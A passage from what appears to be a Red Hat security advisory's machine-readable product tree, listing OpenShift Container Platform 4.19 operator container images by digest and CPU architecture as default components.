"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64"
},
